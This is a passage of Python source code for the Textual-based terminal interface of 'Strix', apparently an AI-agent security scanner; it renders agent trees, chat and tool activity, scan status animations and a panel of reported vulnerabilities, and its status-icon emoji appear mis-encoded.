Fix:**\")\n lines.append(\"```diff\")\n if loc.get(\"fix_before\"):\n lines.extend(f\"- {line}\" for line in loc[\"fix_before\"].splitlines())\n if loc.get(\"fix_after\"):\n lines.extend(f\"+ {line}\" for line in loc[\"fix_after\"].splitlines())\n lines.append(\"```\")\n lines.append(\"\")\n\n # Remediation\n if vuln.get(\"remediation_steps\"):\n lines.extend([\"\", \"## Remediation\", \"\", vuln[\"remediation_steps\"]])\n\n lines.append(\"\")\n return \"\\n\".join(lines)\n\n def on_key(self, event: events.Key) -> None:\n if event.key == \"escape\":\n self.app.pop_screen()\n event.prevent_default()\n\n def on_button_pressed(self, event: Button.Pressed) -> None:\n if event.button.id == \"copy_vuln_detail\":\n markdown_text = self._get_markdown_report()\n self.app.copy_to_clipboard(markdown_text)\n\n copy_button = self.query_one(\"#copy_vuln_detail\", Button)\n copy_button.label = \"Copied!\"\n self.set_timer(1.5, lambda: setattr(copy_button, \"label\", \"Copy\"))\n elif event.button.id == \"close_vuln_detail\":\n self.app.pop_screen()\n\n\nclass VulnerabilityItem(Static): # type: ignore[misc]\n \"\"\"A clickable vulnerability item.\"\"\"\n\n def __init__(self, label: Text, vuln_data: dict[str, Any], **kwargs: Any) -> None:\n super().__init__(label, **kwargs)\n self.vuln_data = vuln_data\n\n def on_click(self, _event: events.Click) -> None:\n \"\"\"Handle click to open vulnerability detail.\"\"\"\n self.app.push_screen(VulnerabilityDetailScreen(self.vuln_data))\n\n\nclass VulnerabilitiesPanel(VerticalScroll): # type: ignore[misc]\n \"\"\"A scrollable panel showing found vulnerabilities with severity-colored dots.\"\"\"\n\n SEVERITY_COLORS: ClassVar[dict[str, str]] = {\n \"critical\": \"#dc2626\", # Red\n \"high\": \"#ea580c\", # Orange\n \"medium\": \"#d97706\", # Amber\n \"low\": \"#22c55e\", # Green\n \"info\": \"#3b82f6\", # Blue\n }\n\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n super().__init__(*args, **kwargs)\n self._vulnerabilities: list[dict[str, Any]] = []\n\n def compose(self) -> ComposeResult:\n return []\n\n def update_vulnerabilities(self, vulnerabilities: list[dict[str, Any]]) -> None:\n \"\"\"Update the list of vulnerabilities and re-render.\"\"\"\n if self._vulnerabilities == vulnerabilities:\n return\n self._vulnerabilities = list(vulnerabilities)\n self._render_panel()\n\n def _render_panel(self) -> None:\n \"\"\"Render the vulnerabilities panel content.\"\"\"\n for child in list(self.children):\n if isinstance(child, VulnerabilityItem):\n child.remove()\n\n if not self._vulnerabilities:\n return\n\n for vuln in self._vulnerabilities:\n severity = vuln.get(\"severity\", \"info\").lower()\n title = vuln.get(\"title\", \"Unknown Vulnerability\")\n color = self.SEVERITY_COLORS.get(severity, \"#3b82f6\")\n\n label = Text()\n label.append(\"● \", style=Style(color=color))\n label.append(title, style=Style(color=\"#d4d4d4\"))\n\n item = VulnerabilityItem(label, vuln, classes=\"vuln-item\")\n self.mount(item)\n\n\nclass QuitScreen(ModalScreen): # type: ignore[misc]\n def compose(self) -> ComposeResult:\n yield Grid(\n Label(\"Quit Strix?\", id=\"quit_title\"),\n Grid(\n Button(\"Yes\", variant=\"error\", id=\"quit\"),\n Button(\"No\", variant=\"default\", id=\"cancel\"),\n id=\"quit_buttons\",\n ),\n id=\"quit_dialog\",\n )\n\n def on_mount(self) -> None:\n cancel_button = self.query_one(\"#cancel\", Button)\n cancel_button.focus()\n\n def on_key(self, event: events.Key) -> None:\n if event.key in (\"left\", \"right\", \"up\", \"down\"):\n focused = self.focused\n\n if focused and focused.id == \"quit\":\n cancel_button = self.query_one(\"#cancel\", Button)\n cancel_button.focus()\n else:\n quit_button = self.query_one(\"#quit\", Button)\n quit_button.focus()\n\n event.prevent_default()\n elif event.key == \"enter\":\n focused = self.focused\n if focused and isinstance(focused, Button):\n focused.press()\n event.prevent_default()\n elif event.key == \"escape\":\n self.app.pop_screen()\n event.prevent_default()\n\n def on_button_pressed(self, event: Button.Pressed) -> None:\n if event.button.id == \"quit\":\n self.app.action_custom_quit()\n else:\n self.app.pop_screen()\n\n\nclass StrixTUIApp(App): # type: ignore[misc]\n CSS_PATH = \"assets/tui_styles.tcss\"\n ALLOW_SELECT = True\n\n SIDEBAR_MIN_WIDTH = 120\n\n selected_agent_id: reactive[str | None] = reactive(default=None)\n show_splash: reactive[bool] = reactive(default=True)\n\n BINDINGS: ClassVar[list[Binding]] = [\n Binding(\"f1\", \"toggle_help\", \"Help\", priority=True),\n Binding(\"ctrl+q\", \"request_quit\", \"Quit\", priority=True),\n Binding(\"ctrl+c\", \"request_quit\", \"Quit\", priority=True),\n Binding(\"escape\", \"stop_selected_agent\", \"Stop Agent\", priority=True),\n ]\n\n def __init__(self, args: argparse.Namespace):\n super().__init__()\n self.args = args\n self.scan_config = self._build_scan_config(args)\n self.agent_config = self._build_agent_config(args)\n\n self.tracer = Tracer(self.scan_config[\"run_name\"])\n self.tracer.set_scan_config(self.scan_config)\n set_global_tracer(self.tracer)\n\n self.agent_nodes: dict[str, TreeNode] = {}\n\n self._displayed_agents: set[str] = set()\n self._displayed_events: list[str] = []\n\n self._streaming_render_cache: dict[str, tuple[int, Any]] = {}\n self._last_streaming_len: dict[str, int] = {}\n\n self._scan_thread: threading.Thread | None = None\n self._scan_stop_event = threading.Event()\n self._scan_completed = threading.Event()\n\n self._spinner_frame_index: int = 0 # Current animation frame index\n self._sweep_num_squares: int = 6 # Number of squares in sweep animation\n self._sweep_colors: list[str] = [\n \"#000000\", # Dimmest (shows dot)\n \"#031a09\",\n \"#052e16\",\n \"#0d4a2a\",\n \"#15803d\",\n \"#22c55e\",\n \"#4ade80\",\n \"#86efac\", # Brightest\n ]\n self._dot_animation_timer: Any | None = None\n\n self._setup_cleanup_handlers()\n\n def _build_scan_config(self, args: argparse.Namespace) -> dict[str, Any]:\n return {\n \"scan_id\": args.run_name,\n \"targets\": args.targets_info,\n \"user_instructions\": args.instruction or \"\",\n \"run_name\": args.run_name,\n }\n\n def _build_agent_config(self, args: argparse.Namespace) -> dict[str, Any]:\n scan_mode = getattr(args, \"scan_mode\", \"deep\")\n llm_config = LLMConfig(scan_mode=scan_mode, interactive=True)\n\n config = {\n \"llm_config\": llm_config,\n \"max_iterations\": 300,\n }\n\n if getattr(args, \"local_sources\", None):\n config[\"local_sources\"] = args.local_sources\n\n return config\n\n def _setup_cleanup_handlers(self) -> None:\n def cleanup_on_exit() -> None:\n from strix.runtime import cleanup_runtime\n\n self.tracer.cleanup()\n cleanup_runtime()\n\n def signal_handler(_signum: int, _frame: Any) -> None:\n self.tracer.cleanup()\n sys.exit(0)\n\n atexit.register(cleanup_on_exit)\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n if hasattr(signal, \"SIGHUP\"):\n signal.signal(signal.SIGHUP, signal_handler)\n\n def compose(self) -> ComposeResult:\n if self.show_splash:\n yield SplashScreen(id=\"splash_screen\")\n\n def watch_show_splash(self, show_splash: bool) -> None:\n if not show_splash and self.is_mounted:\n try:\n splash = self.query_one(\"#splash_screen\")\n splash.remove()\n except ValueError:\n pass\n\n main_container = Vertical(id=\"main_container\")\n\n self.mount(main_container)\n\n content_container = Horizontal(id=\"content_container\")\n main_container.mount(content_container)\n\n chat_area_container = Vertical(id=\"chat_area_container\")\n\n chat_display = Static(\"\", id=\"chat_display\")\n chat_history = VerticalScroll(chat_display, id=\"chat_history\")\n chat_history.can_focus = True\n\n status_text = Static(\"\", id=\"status_text\")\n status_text.ALLOW_SELECT = False\n keymap_indicator = Static(\"\", id=\"keymap_indicator\")\n keymap_indicator.ALLOW_SELECT = False\n\n agent_status_display = Horizontal(\n status_text, keymap_indicator, id=\"agent_status_display\", classes=\"hidden\"\n )\n\n chat_prompt = Static(\"> \", id=\"chat_prompt\")\n chat_prompt.ALLOW_SELECT = False\n chat_input = ChatTextArea(\n \"\",\n id=\"chat_input\",\n show_line_numbers=False,\n )\n chat_input.set_app_reference(self)\n chat_input_container = Horizontal(chat_prompt, chat_input, id=\"chat_input_container\")\n\n agents_tree = Tree(\"Agents\", id=\"agents_tree\")\n agents_tree.root.expand()\n agents_tree.show_root = False\n\n agents_tree.show_guide = True\n agents_tree.guide_depth = 3\n agents_tree.guide_style = \"dashed\"\n\n stats_display = Static(\"\", id=\"stats_display\")\n stats_scroll = VerticalScroll(stats_display, id=\"stats_scroll\")\n\n vulnerabilities_panel = VulnerabilitiesPanel(id=\"vulnerabilities_panel\")\n\n sidebar = Vertical(agents_tree, vulnerabilities_panel, stats_scroll, id=\"sidebar\")\n\n content_container.mount(chat_area_container)\n content_container.mount(sidebar)\n\n chat_area_container.mount(chat_history)\n chat_area_container.mount(agent_status_display)\n chat_area_container.mount(chat_input_container)\n\n self.call_after_refresh(self._focus_chat_input)\n\n def _focus_chat_input(self) -> None:\n if len(self.screen_stack) > 1 or self.show_splash:\n return\n\n if not self.is_mounted:\n return\n\n try:\n chat_input = self.query_one(\"#chat_input\", ChatTextArea)\n chat_input.show_vertical_scrollbar = False\n chat_input.show_horizontal_scrollbar = False\n chat_input.focus()\n except (ValueError, Exception):\n self.call_after_refresh(self._focus_chat_input)\n\n def _focus_agents_tree(self) -> None:\n if len(self.screen_stack) > 1 or self.show_splash:\n return\n\n if not self.is_mounted:\n return\n\n try:\n agents_tree = self.query_one(\"#agents_tree\", Tree)\n agents_tree.focus()\n\n if agents_tree.root.children:\n first_node = agents_tree.root.children[0]\n agents_tree.select_node(first_node)\n except (ValueError, Exception):\n self.call_after_refresh(self._focus_agents_tree)\n\n def on_mount(self) -> None:\n self.title = \"strix\"\n\n self.set_timer(4.5, self._hide_splash_screen)\n\n def _hide_splash_screen(self) -> None:\n self.show_splash = False\n\n self._start_scan_thread()\n\n self.set_interval(0.35, self._update_ui_from_tracer)\n\n def _update_ui_from_tracer(self) -> None:\n if self.show_splash:\n return\n\n if len(self.screen_stack) > 1:\n return\n\n if not self.is_mounted:\n return\n\n try:\n chat_history = self.query_one(\"#chat_history\", VerticalScroll)\n agents_tree = self.query_one(\"#agents_tree\", Tree)\n\n if not self._is_widget_safe(chat_history) or not self._is_widget_safe(agents_tree):\n return\n except (ValueError, Exception):\n return\n\n agent_updates = False\n for agent_id, agent_data in list(self.tracer.agents.items()):\n if agent_id not in self._displayed_agents:\n self._add_agent_node(agent_data)\n self._displayed_agents.add(agent_id)\n agent_updates = True\n elif self._update_agent_node(agent_id, agent_data):\n agent_updates = True\n\n if agent_updates:\n self._expand_new_agent_nodes()\n\n self._update_chat_view()\n\n self._update_agent_status_display()\n\n self._update_stats_display()\n\n self._update_vulnerabilities_panel()\n\n def _update_agent_node(self, agent_id: str, agent_data: dict[str, Any]) -> bool:\n if agent_id not in self.agent_nodes:\n return False\n\n try:\n agent_node = self.agent_nodes[agent_id]\n agent_name_raw = agent_data.get(\"name\", \"Agent\")\n status = agent_data.get(\"status\", \"running\")\n\n status_indicators = {\n \"running\": \"βšͺ\",\n \"waiting\": \"⏸\",\n \"completed\": \"🟒\",\n \"failed\": \"πŸ”΄\",\n \"stopped\": \"β– \",\n \"stopping\": \"β—‹\",\n \"llm_failed\": \"πŸ”΄\",\n }\n\n status_icon = status_indicators.get(status, \"β—‹\")\n vuln_count = self._agent_vulnerability_count(agent_id)\n vuln_indicator = f\" ({vuln_count})\" if vuln_count > 0 else \"\"\n agent_name = f\"{status_icon} {agent_name_raw}{vuln_indicator}\"\n\n if agent_node.label != agent_name:\n agent_node.set_label(agent_name)\n return True\n\n except (KeyError, AttributeError, ValueError) as e:\n import logging\n\n logging.warning(f\"Failed to update agent node label: {e}\")\n\n return False\n\n def _get_chat_content(\n self,\n ) -> tuple[Any, str | None]:\n if not self.selected_agent_id:\n return self._get_chat_placeholder_content(\n \"Select an agent from the tree to see its activity.\", \"placeholder-no-agent\"\n )\n\n events = self._gather_agent_events(self.selected_agent_id)\n streaming = self.tracer.get_streaming_content(self.selected_agent_id)\n\n if not events and not streaming:\n return self._get_chat_placeholder_content(\n \"Starting agent...\", \"placeholder-no-activity\"\n )\n\n current_event_ids = [e[\"id\"] for e in events]\n current_streaming_len = len(streaming) if streaming else 0\n last_streaming_len = self._last_streaming_len.get(self.selected_agent_id, 0)\n\n if (\n current_event_ids == self._displayed_events\n and current_streaming_len == last_streaming_len\n ):\n return None, None\n\n self._displayed_events = current_event_ids\n self._last_streaming_len[self.selected_agent_id] = current_streaming_len\n return self._get_rendered_events_content(events), \"chat-content\"\n\n def _update_chat_view(self) -> None:\n if len(self.screen_stack) > 1 or self.show_splash or not self.is_mounted:\n return\n\n try:\n chat_history = self.query_one(\"#chat_history\", VerticalScroll)\n except (ValueError, Exception):\n return\n\n if not self._is_widget_safe(chat_history):\n return\n\n try:\n is_at_bottom = chat_history.scroll_y >= chat_history.max_scroll_y\n except (AttributeError, ValueError):\n is_at_bottom = True\n\n content, css_class = self._get_chat_content()\n if content is None:\n return\n\n chat_display = self.query_one(\"#chat_display\", Static)\n self._safe_widget_operation(chat_display.update, content)\n chat_display.set_classes(css_class)\n\n if is_at_bottom:\n self.call_later(chat_history.scroll_end, animate=False)\n\n def _get_chat_placeholder_content(\n self, message: str, placeholder_class: str\n ) -> tuple[Text, str]:\n self._displayed_events = [placeholder_class]\n text = Text()\n text.append(message)\n return text, f\"chat-placeholder {placeholder_class}\"\n\n @staticmethod\n def _merge_renderables(renderables: list[Any]) -> Text:\n \"\"\"Merge renderables into a single Text for mouse text selection support.\"\"\"\n combined = Text()\n for i, item in enumerate(renderables):\n if i > 0:\n combined.append(\"\\n\")\n StrixTUIApp._append_renderable(combined, item)\n return StrixTUIApp._sanitize_text(combined)\n\n @staticmethod\n def _sanitize_text(text: Text) -> Text:\n \"\"\"Clamp spans so Rich/Textual can't crash on malformed offsets.\"\"\"\n plain = text.plain\n text_length = len(plain)\n sanitized_spans: list[Span] = []\n\n for span in text.spans:\n start = max(0, min(span.start, text_length))\n end = max(0, min(span.end, text_length))\n if end > start:\n sanitized_spans.append(Span(start, end, span.style))\n\n return Text(\n plain,\n style=text.style,\n justify=text.justify,\n overflow=text.overflow,\n no_wrap=text.no_wrap,\n end=text.end,\n tab_size=text.tab_size,\n spans=sanitized_spans,\n )\n\n @staticmethod\n def _append_renderable(combined: Text, item: Any) -> None:\n \"\"\"Recursively append a renderable's text content to a combined Text.\"\"\"\n if isinstance(item, Text):\n combined.append_text(StrixTUIApp._sanitize_text(item))\n elif isinstance(item, Group):\n for j, sub in enumerate(item.renderables):\n if j > 0:\n combined.append(\"\\n\")\n StrixTUIApp._append_renderable(combined, sub)\n else:\n inner = getattr(item, \"renderable\", None)\n if inner is not None:\n StrixTUIApp._append_renderable(combined, inner)\n else:\n combined.append(str(item))\n\n def _get_rendered_events_content(self, events: list[dict[str, Any]]) -> Any:\n renderables: list[Any] = []\n\n if not events:\n return Text()\n\n for event in events:\n content: Any = None\n\n if event[\"type\"] == \"chat\":\n content = self._render_chat_content(event[\"data\"])\n elif event[\"type\"] == \"tool\":\n content = self._render_tool_content_simple(event[\"data\"])\n\n if content:\n if renderables:\n renderables.append(Text(\"\"))\n renderables.append(content)\n\n if self.selected_agent_id:\n streaming = self.tracer.get_streaming_content(self.selected_agent_id)\n if streaming:\n streaming_text = self._render_streaming_content(streaming)\n if streaming_text:\n if renderables:\n renderables.append(Text(\"\"))\n renderables.append(streaming_text)\n\n if not renderables:\n return Text()\n\n if len(renderables) == 1 and isinstance(renderables[0], Text):\n return self._sanitize_text(renderables[0])\n\n return self._merge_renderables(renderables)\n\n def _render_streaming_content(self, content: str, agent_id: str | None = None) -> Any:\n cache_key = agent_id or self.selected_agent_id or \"\"\n content_len = len(content)\n\n if cache_key in self._streaming_render_cache:\n cached_len, cached_output = self._streaming_render_cache[cache_key]\n if cached_len == content_len:\n return cached_output\n\n renderables: list[Any] = []\n segments = parse_streaming_content(content)\n\n for segment in segments:\n if segment.type == \"text\":\n text_content = AgentMessageRenderer.render_simple(segment.content)\n if renderables:\n renderables.append(Text(\"\"))\n renderables.append(text_content)\n\n elif segment.type == \"tool\":\n tool_renderable = self._render_streaming_tool(\n segment.tool_name or \"unknown\",\n segment.args or {},\n segment.is_complete,\n )\n if renderables:\n renderables.append(Text(\"\"))\n renderables.append(tool_renderable)\n\n if not renderables:\n result = Text()\n elif len(renderables) == 1 and isinstance(renderables[0], Text):\n result = self._sanitize_text(renderables[0])\n else:\n result = self._merge_renderables(renderables)\n\n self._streaming_render_cache[cache_key] = (content_len, result)\n return result\n\n def _render_streaming_tool(\n self, tool_name: str, args: dict[str, str], is_complete: bool\n ) -> Any:\n tool_data = {\n \"tool_name\": tool_name,\n \"args\": args,\n \"status\": \"completed\" if is_complete else \"running\",\n \"result\": None,\n }\n\n renderer = get_tool_renderer(tool_name)\n if renderer:\n widget = renderer.render(tool_data)\n return widget.renderable\n\n return self._render_default_streaming_tool(tool_name, args, is_complete)\n\n def _render_default_streaming_tool(\n self, tool_name: str, args: dict[str, str], is_complete: bool\n ) -> Text:\n text = Text()\n\n if is_complete:\n text.append(\"βœ“ \", style=\"green\")\n else:\n text.append(\"● \", style=\"yellow\")\n\n text.append(\"Using tool \", style=\"dim\")\n text.append(tool_name, style=\"bold blue\")\n\n if args:\n for key, value in list(args.items())[:3]:\n text.append(\"\\n \")\n text.append(key, style=\"dim\")\n text.append(\": \")\n display_value = value if len(value) <= 100 else value[:97] + \"...\"\n text.append(display_value, style=\"italic\" if not is_complete else None)\n\n return text\n\n def _get_status_display_content(\n self, agent_id: str, agent_data: dict[str, Any]\n ) -> tuple[Text | None, Text, bool]:\n status = agent_data.get(\"status\", \"running\")\n\n def keymap_styled(keys: list[tuple[str, str]]) -> Text:\n t = Text()\n for i, (key, action) in enumerate(keys):\n if i > 0:\n t.append(\" Β· \", style=\"dim\")\n t.append(key, style=\"white\")\n t.append(\" \", style=\"dim\")\n t.append(action, style=\"dim\")\n return t\n\n simple_statuses: dict[str, tuple[str, str]] = {\n \"stopping\": (\"Agent stopping...\", \"\"),\n \"stopped\": (\"Agent stopped\", \"\"),\n \"completed\": (\"Agent completed\", \"\"),\n }\n\n if status in simple_statuses:\n msg, _ = simple_statuses[status]\n text = Text()\n text.append(msg)\n return (text, Text(), False)\n\n if status == \"llm_failed\":\n error_msg = agent_data.get(\"error_message\", \"\")\n text = Text()\n if error_msg:\n text.append(error_msg, style=\"red\")\n else:\n text.append(\"LLM request failed\", style=\"red\")\n self._stop_dot_animation()\n keymap = Text()\n keymap.append(\"Send message to retry\", style=\"dim\")\n return (text, keymap, False)\n\n if status == \"waiting\":\n keymap = Text()\n keymap.append(\"Send message to resume\", style=\"dim\")\n return (Text(\" \"), keymap, False)\n\n if status == \"running\":\n if self._agent_has_real_activity(agent_id):\n animated_text = Text()\n animated_text.append_text(self._get_sweep_animation(self._sweep_colors))\n animated_text.append(\"esc\", style=\"white\")\n animated_text.append(\" \", style=\"dim\")\n animated_text.append(\"stop\", style=\"dim\")\n return (animated_text, keymap_styled([(\"ctrl-q\", \"quit\")]), True)\n animated_text = self._get_animated_verb_text(agent_id, \"Initializing\")\n return (animated_text, keymap_styled([(\"ctrl-q\", \"quit\")]), True)\n\n return (None, Text(), False)\n\n def _update_agent_status_display(self) -> None:\n try:\n status_display = self.query_one(\"#agent_status_display\", Horizontal)\n status_text = self.query_one(\"#status_text\", Static)\n keymap_indicator = self.query_one(\"#keymap_indicator\", Static)\n except (ValueError, Exception):\n return\n\n widgets = [status_display, status_text, keymap_indicator]\n if not all(self._is_widget_safe(w) for w in widgets):\n return\n\n if not self.selected_agent_id:\n self._safe_widget_operation(status_display.add_class, \"hidden\")\n return\n\n try:\n agent_data = self.tracer.agents[self.selected_agent_id]\n content, keymap, should_animate = self._get_status_display_content(\n self.selected_agent_id, agent_data\n )\n\n if not content:\n self._safe_widget_operation(status_display.add_class, \"hidden\")\n return\n\n self._safe_widget_operation(status_text.update, content)\n self._safe_widget_operation(keymap_indicator.update, keymap)\n self._safe_widget_operation(status_display.remove_class, \"hidden\")\n\n if should_animate:\n self._start_dot_animation()\n\n except (KeyError, Exception):\n self._safe_widget_operation(status_display.add_class, \"hidden\")\n\n def _update_stats_display(self) -> None:\n try:\n stats_display = self.query_one(\"#stats_display\", Static)\n except (ValueError, Exception):\n return\n\n if not self._is_widget_safe(stats_display):\n return\n\n if self.screen.selections:\n return\n\n stats_content = Text()\n\n stats_text = build_tui_stats_text(self.tracer, self.agent_config)\n if stats_text:\n stats_content.append(stats_text)\n\n version = get_package_version()\n stats_content.append(f\"\\nv{version}\", style=\"white\")\n\n self._safe_widget_operation(stats_display.update, stats_content)\n\n def _update_vulnerabilities_panel(self) -> None:\n \"\"\"Update the vulnerabilities panel with current vulnerability data.\"\"\"\n try:\n vuln_panel = self.query_one(\"#vulnerabilities_panel\", VulnerabilitiesPanel)\n except (ValueError, Exception):\n return\n\n if not self._is_widget_safe(vuln_panel):\n return\n\n vulnerabilities = self.tracer.vulnerability_reports\n\n if not vulnerabilities:\n self._safe_widget_operation(vuln_panel.add_class, \"hidden\")\n return\n\n enriched_vulns = []\n for vuln in vulnerabilities:\n enriched = dict(vuln)\n report_id = vuln.get(\"id\", \"\")\n agent_name = self._get_agent_name_for_vulnerability(report_id)\n if agent_name:\n enriched[\"agent_name\"] = agent_name\n enriched_vulns.append(enriched)\n\n self._safe_widget_operation(vuln_panel.remove_class, \"hidden\")\n vuln_panel.update_vulnerabilities(enriched_vulns)\n\n def _get_agent_name_for_vulnerability(self, report_id: str) -> str | None:\n \"\"\"Find the agent name that created a vulnerability report.\"\"\"\n for _exec_id, tool_data in list(self.tracer.tool_executions.items()):\n if tool_data.get(\"tool_name\") == \"create_vulnerability_report\":\n result = tool_data.get(\"result\", {})\n if isinstance(result, dict) and result.get(\"report_id\") == report_id:\n agent_id = tool_data.get(\"agent_id\")\n if agent_id and agent_id in self.tracer.agents:\n name: str = self.tracer.agents[agent_id].get(\"name\", \"Unknown Agent\")\n return name\n return None\n\n def _get_sweep_animation(self, color_palette: list[str]) -> Text:\n text = Text()\n num_squares = self._sweep_num_squares\n num_colors = len(color_palette)\n\n offset = num_colors - 1\n max_pos = (num_squares - 1) + offset\n total_range = max_pos + offset\n cycle_length = total_range * 2\n frame_in_cycle = self._spinner_frame_index % cycle_length\n\n wave_pos = total_range - abs(total_range - frame_in_cycle)\n sweep_pos = wave_pos - offset\n\n dot_color = \"#0a3d1f\"\n\n for i in range(num_squares):\n dist = abs(i - sweep_pos)\n color_idx = max(0, num_colors - 1 - dist)\n\n if color_idx == 0:\n text.append(\"Β·\", style=Style(color=dot_color))\n else:\n color = color_palette[color_idx]\n text.append(\"β–ͺ\", style=Style(color=color))\n\n text.append(\" \")\n return text\n\n def _get_animated_verb_text(self, agent_id: str, verb: str) -> Text: # noqa: ARG002\n text = Text()\n sweep = self._get_sweep_animation(self._sweep_colors)\n text.append_text(sweep)\n parts = verb.split(\" \", 1)\n text.append(parts[0], style=\"white\")\n if len(parts) > 1:\n text.append(\" \", style=\"dim\")\n text.append(parts[1], style=\"dim\")\n return text\n\n def _start_dot_animation(self) -> None:\n if self._dot_animation_timer is None:\n self._dot_animation_timer = self.set_interval(0.06, self._animate_dots)\n\n def _stop_dot_animation(self) -> None:\n if self._dot_animation_timer is not None:\n self._dot_animation_timer.stop()\n self._dot_animation_timer = None\n\n def _animate_dots(self) -> None:\n has_active_agents = False\n\n if self.selected_agent_id and self.selected_agent_id in self.tracer.agents:\n agent_data = self.tracer.agents[self.selected_agent_id]\n status = agent_data.get(\"status\", \"running\")\n if status in [\"running\", \"waiting\"]:\n has_active_agents = True\n num_colors = len(self._sweep_colors)\n offset = num_colors - 1\n max_pos = (self._sweep_num_squares - 1) + offset\n total_range = max_pos + offset\n cycle_length = total_range * 2\n self._spinner_frame_index = (self._spinner_frame_index + 1) % cycle_length\n self._update_agent_status_display()\n\n if not has_active_agents:\n has_active_agents = any(\n agent_data.get(\"status\", \"running\") in [\"running\", \"waiting\"]\n for agent_data in self.tracer.agents.values()\n )\n\n if not has_active_agents:\n self._stop_dot_animation()\n self._spinner_frame_index = 0\n\n def _agent_has_real_activity(self, agent_id: str) -> bool:\n initial_tools = {\"scan_start_info\", \"subagent_start_info\"}\n\n for _exec_id, tool_data in list(self.tracer.tool_executions.items()):\n if tool_data.get(\"agent_id\") == agent_id:\n tool_name = tool_data.get(\"tool_name\", \"\")\n if tool_name not in initial_tools:\n return True\n\n streaming = self.tracer.get_streaming_content(agent_id)\n return bool(streaming and streaming.strip())\n\n def _agent_vulnerability_count(self, agent_id: str) -> int:\n count = 0\n for _exec_id, tool_data in list(self.tracer.tool_executions.items()):\n if tool_data.get(\"agent_id\") == agent_id:\n tool_name = tool_data.get(\"tool_name\", \"\")\n if tool_name == \"create_vulnerability_report\":\n status = tool_data.get(\"status\", \"\")\n if status == \"completed\":\n result = tool_data.get(\"result\", {})\n if isinstance(result, dict) and result.get(\"success\"):\n count += 1\n return count\n\n def _gather_agent_events(self, agent_id: str) -> list[dict[str, Any]]:\n chat_events = [\n {\n \"type\": \"chat\",\n \"timestamp\": msg[\"timestamp\"],\n \"id\": f\"chat_{msg['message_id']}\",\n \"data\": msg,\n }\n for msg in self.tracer.chat_messages\n if msg.get(\"agent_id\") == agent_id\n ]\n\n tool_events = [\n {\n \"type\": \"tool\",\n \"timestamp\": tool_data[\"timestamp\"],\n \"id\": f\"tool_{exec_id}\",\n \"data\": tool_data,\n }\n for exec_id, tool_data in list(self.tracer.tool_executions.items())\n if tool_data.get(\"agent_id\") == agent_id\n ]\n\n events = chat_events + tool_events\n events.sort(key=lambda e: (e[\"timestamp\"], e[\"id\"]))\n return events\n\n def watch_selected_agent_id(self, _agent_id: str | None) -> None:\n if len(self.screen_stack) > 1 or self.show_splash:\n return\n\n if not self.is_mounted:\n return\n\n self._displayed_events.clear()\n self._streaming_render_cache.clear()\n self._last_streaming_len.clear()\n\n self.call_later(self._update_chat_view)\n self._update_agent_status_display()\n\n def _start_scan_thread(self) -> None:\n def scan_target() -> None:\n try:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n try:\n agent = StrixAgent(self.agent_config)\n\n if not self._scan_stop_event.is_set():\n loop.run_until_complete(agent.execute_scan(self.scan_config))\n\n except (KeyboardInterrupt, asyncio.CancelledError):\n logging.info(\"Scan interrupted by user\")\n except (ConnectionError, TimeoutError):\n logging.exception(\"Network error during scan\")\n except RuntimeError:\n logging.exception(\"Runtime error during scan\")\n except Exception:\n logging.exception(\"Unexpected error during scan\")\n finally:\n loop.close()\n self._scan_completed.set()\n\n except Exception:\n logging.exception(\"Error setting up scan thread\")\n self._scan_completed.set()\n\n self._scan_thread = threading.Thread(target=scan_target, daemon=True)\n self._scan_thread.start()\n\n def _add_agent_node(self, agent_data: dict[str, Any]) -> None:\n if len(self.screen_stack) > 1 or self.show_splash:\n return\n\n if not self.is_mounted:\n return\n\n agent_id = agent_data[\"id\"]\n parent_id = agent_data.get(\"parent_id\")\n status = agent_data.get(\"status\", \"running\")\n\n try:\n agents_tree = self.query_one(\"#agents_tree\", Tree)\n except (ValueError, Exception):\n return\n\n agent_name_raw = agent_data.get(\"name\", \"Agent\")\n\n status_indicators = {\n \"running\": \"βšͺ\",\n \"waiting\": \"⏸\",\n \"completed\": \"🟒\",\n \"failed\": \"πŸ”΄\",\n \"stopped\": \"β– \",\n \"stopping\": \"β—‹\",\n \"llm_failed\": \"πŸ”΄\",\n }\n\n status_icon = status_indicators.get(status, \"β—‹\")\n vuln_count = self._agent_vulnerability_count(agent_id)\n vuln_indicator = f\" ({vuln_count})\" if vuln_count > 0 else \"\"\n agent_name = f\"{status_icon} {agent_name_raw}{vuln_indicator}\"\n\n try:\n if parent_id and parent_id in self.agent_nodes:\n parent_node = self.agent_nodes[parent_id]\n agent_node = parent_node.add(\n agent_name,\n data={\"agent_id\": agent_id},\n )\n parent_node.allow_expand = True\n else:\n agent_node = agents_tree.root.add(\n agent_name,\n data={\"agent_id\": agent_id},\n )\n\n agent_node.allow_expand = False\n agent_node.expand()\n self.agent_nodes[agent_id] = agent_node\n\n if len(self.agent_nodes) == 1:\n agents_tree.select_node(agent_node)\n self.selected_agent_id = agent_id\n\n self._reorganize_orphaned_agents(agent_id)\n except (AttributeError, ValueError, RuntimeError) as e:\n import logging\n\n logging.warning(f\"Failed to add agent node {agent_id}: {e}\")\n\n def _expand_new_agent_nodes(self) -> None:\n if len(self.screen_stack) > 1 or self.show_splash:\n return\n\n if not self.is_mounted:\n return\n\n def _expand_all_agent_nodes(self) -> None:\n if len(self.screen_stack) > 1 or self.show_splash:\n return\n\n if not self.is_mounted:\n return\n\n try:\n agents_tree = self.query_one(\"#agents_tree\", Tree)\n self._expand_node_recursively(agents_tree.root)\n except (ValueError, Exception):\n logging.debug(\"Tree not ready for expanding nodes\")\n\n def _expand_node_recursively(self, node: TreeNode) -> None:\n if not node.is_expanded:\n node.expand()\n for child in node.children:\n self._expand_node_recursively(child)\n\n def _copy_node_under(self, node_to_copy: TreeNode, new_parent: TreeNode) -> None:\n agent_id = node_to_copy.data[\"agent_id\"]\n agent_data = self.tracer.agents.get(agent_id, {})\n agent_name_raw = agent_data.get(\"name\", \"Agent\")\n status = agent_data.get(\"status\", \"running\")\n\n status_indicators = {\n \"running\": \"βšͺ\",\n \"waiting\": \"⏸\",\n \"completed\": \"🟒\",\n \"failed\": \"πŸ”΄\",\n \"stopped\": \"β– \",\n \"stopping\": \"β—‹\",\n \"llm_failed\": \"πŸ”΄\",\n }\n\n status_icon = status_indicators.get(status, \"β—‹\")\n vuln_count = self._agent_vulnerability_count(agent_id)\n vuln_indicator = f\" ({vuln_count})\" if vuln_count > 0 else \"\"\n agent_name = f\"{status_icon} 